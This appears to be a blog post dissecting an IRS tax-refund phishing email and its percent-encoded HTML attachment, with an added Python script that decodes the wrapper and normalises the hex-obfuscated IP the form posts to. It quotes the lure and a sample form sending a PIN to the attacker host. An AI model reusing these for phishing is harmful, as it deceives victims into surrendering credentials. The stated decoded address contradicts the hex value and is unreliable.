Every once in a while, a spin around the old spam folder can be interesting just to see what trickery the spammers are up to lately. You never know what the Nigerian Prince has up his sleeve. In a recent foray, I found an entertaining e-mail from the “IRS”. I knew it was going to be first-rate when I saw the exclamation point in the subject line:
Internal Revenue Service (IRS)
United States Department of the Treasury
After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of $773.80. Please submit the tax refund request and allow us 6-9 days in order to process it.
A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline. To access your tax refund, use the form attached to this email.
Internal Revenue Service
First, I have to congratulate the “IRS” for figuring out my e-mail address and connecting it with my tax records. Then there’s the fact that my check will be here within 9 days. That’s fast! Unless, of course, it’s delayed and I never hear from them again. Hopefully my bank account doesn’t slowly empty while I wait.
Once you get beyond the questionable e-mail, though, things actually get a little scary. Attached to the e-mail was an .html file that I was supposed to fill out. Curious how it worked (but not wanting to open the page in a browser), I opened up the source in my favorite text editor. The entire page code was eerily simple:
<!-- HTML Encryption provided by Internal Revenue Service -->
document.write(unescape('[50 KB of percent encoded numbers]'));
The actual content the page writes to the DOM is percent-encoded (as in URLs), making it hard to see what’s going on without rendering it in a browser. Using a nifty decoding tool, I unpacked the HTML. All of the CSS and image resources were linked directly from the IRS.gov website, making the source and the page look awfully authentic. The only sign that another party was involved was the site the form was set to submit to. Again, the spammer used some encoding to mask their identity. The form went to http://0x3F.0xDCC619/, which resolves to https://220.127.116.11/. Very crafty people who are definitely not planning to send me a tax refund anytime soon.
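An added example that is not from the original post: an analyst-side script that performs the two decoding steps described above, unpacking the document.write(unescape(...)) wrapper to find where the form submits, and rewriting a hex-obfuscated numeric host as the dotted-decimal address a browser would actually connect to, using the inet_aton rules (it also accepts the octal and single-number forms the post does not show). The attachment text is a constructed stand-in for the 50 KB original.

```python
import re
import socket
import struct
from urllib.parse import unquote

# Constructed stand-in for the attachment: the post's document.write(unescape('...')) wrapper around a tiny form.
SAMPLE_ATTACHMENT = (
    "<!-- HTML Encryption provided by Internal Revenue Service -->\n"
    "document.write(unescape('%3Cform%20method%3D%22post%22%20action%3D%22"
    "http%3A%2F%2F0x3F.0xDCC619%2F%22%3E%3Cinput%20name%3D%22pin%22%3E%3C%2Fform%3E'));\n"
)

def unwrap_document_write(js: str) -> str:
    """Percent-decode the literal inside document.write(unescape('...')), as the browser would."""
    m = re.search(r"document\.write\(unescape\('([^']*)'\)\)", js)
    if m is None:
        raise ValueError("no document.write(unescape(...)) wrapper found")
    return unquote(m.group(1))

def form_actions(html: str) -> list:
    """Every <form action=...> target in the decoded page: where the victim's data would go."""
    return re.findall(r"<form[^>]*\baction=[\"']([^\"']+)[\"']", html, flags=re.IGNORECASE)

def _numeric_part(part: str) -> int:
    # inet_aton syntax: 0x prefix is hex, a leading 0 is octal, anything else is decimal.
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)

def canonical_host(url: str) -> str:
    """Rewrite an obfuscated numeric host as the dotted-decimal address the browser connects to.
    With fewer than four parts the last part fills every remaining octet (0x3F.0xDCC619 = 1 + 3)."""
    host = re.match(r"https?://([^/:?#]+)", url).group(1)
    parts = [_numeric_part(p) for p in host.split(".")]
    if not 1 <= len(parts) <= 4:
        raise ValueError("not a numeric IPv4 host: " + host)
    last_bits = 8 * (5 - len(parts))  # bits covered by the final part: 32, 24, 16 or 8
    if any(p > 255 for p in parts[:-1]) or parts[-1] >= 1 << last_bits:
        raise ValueError("part out of range in host: " + host)
    value = 0
    for p in parts[:-1]:
        value = (value << 8) | p
    value = (value << last_bits) | parts[-1]
    return socket.inet_ntoa(struct.pack("!I", value))

def submit_targets(js: str) -> list:
    """(raw action, canonical host) for each form in the attachment, ready for a reputation lookup."""
    return [(a, canonical_host(a)) for a in form_actions(unwrap_document_write(js))]
```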
Turns out that the IP is owned by Beyond The Network America, a shady spam organization. A quick web search shows their involvement in vanilla spam, phishing attacks like the one I got, and various other types of Internet chicanery. BTNA even has the dubious distinction of having been banned from Wikipedia since March of 2007 (#87!). But their spam machine rolls on.
So that was my latest foray into the Spam folder. I found out that my spam was linked to a large spam-sending organization, and that said organization is pretty good at making their fake pages appear authentic. Despite their efforts, though, there were quite a few warning signs that something was amiss, starting with the e-mail itself and ending with the form they wanted me to fill out. A friendly reminder to anyone out there who may be tempted by $800: even if the IRS were looking to contact you about a surprise refund (as if), they would not be e-mailing to ask for your ATM card’s PIN. Every time someone does ask for that, you can just forward them on their merry way to the FTC’s CAN-SPAM people.
[Image: full-size view of the fake page, styled with real IRS resources]